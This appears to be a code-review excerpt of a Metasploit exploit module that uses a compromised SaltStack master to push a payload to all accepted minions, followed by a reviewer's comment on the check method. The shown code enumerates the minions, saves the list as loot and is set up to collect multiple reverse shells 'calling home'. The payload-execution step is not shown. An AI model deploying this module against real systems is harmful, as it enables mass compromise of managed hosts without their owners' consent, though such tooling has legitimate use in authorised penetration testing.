modules/exploits/linux/local/saltstack_salt_minion_deployer.rb

```diff
@@ -0,0 +1,155 @@
+        'Privileged' => true,
+        'References' => [],
+        'DisclosureDate' => '2011-03-19', # saltstack salt original release date
+        'DefaultTarget' => 0,
+        'Passive' => true, # this allows us to get multiple shells calling home
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options [
+      OptString.new('SALT', [true, 'salt-master executable location', '']),
+      OptString.new('MINIONS', [true, 'Minions Target', '*']),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
+      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
+      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),
+      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run', 120])
+    ]
+  end
+
+  def salt_master
+    return @salt if @salt
+
+    ['/usr/bin/salt-master', datastore['SALT']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @salt = exec
+    end
+    @salt
+  end
+
+  # taken from saltstack_salt.rb module
+  def list_minions
+    # pull minions from a master
+    print_status('Attempting to list minions')
+    unless command_exists?('salt-key')
+      print_error('salt-key not present on system')
+      return
+    end
+
+    count = 0
+
+    begin
+      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
+      vprint_status(out)
+      minions = YAML.safe_load(out)
+    rescue Psych::SyntaxError
+      print_error('Unable to load salt-key -L data')
+      return
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Minions List',
+      'Indent' => 1,
+      'Columns' => ['Status', 'Minion Name']
+    )
+
+    store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
+    print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+    minions['minions'].each do |minion|
+      tbl << ['Accepted', minion]
+      count += 1
+    end
+
+    print_good(tbl.to_s)
+    print_good("#{count} minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.")
+    Rex.sleep(10)
+  end
+
+  def check
+    return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?
+
+    if writable?(datastore['WritableDir'])
+      vprint_good("#{datastore['WritableDir']} is writable, and salt-master executable found")
+      return CheckCode::Vulnerable
+    end
+    CheckCode::Safe("#{datastore['WritableDir']} is not writable")
```

Comment:
Yes, we should check this, but probably not in the check method.  The target will still be vulnerable, just we did not give it the right input.  This sounds more like a `fail_with` bad config error outside the scope of the check method.
Edit: you already did that in the exploit method; I would just take this part out of the check method.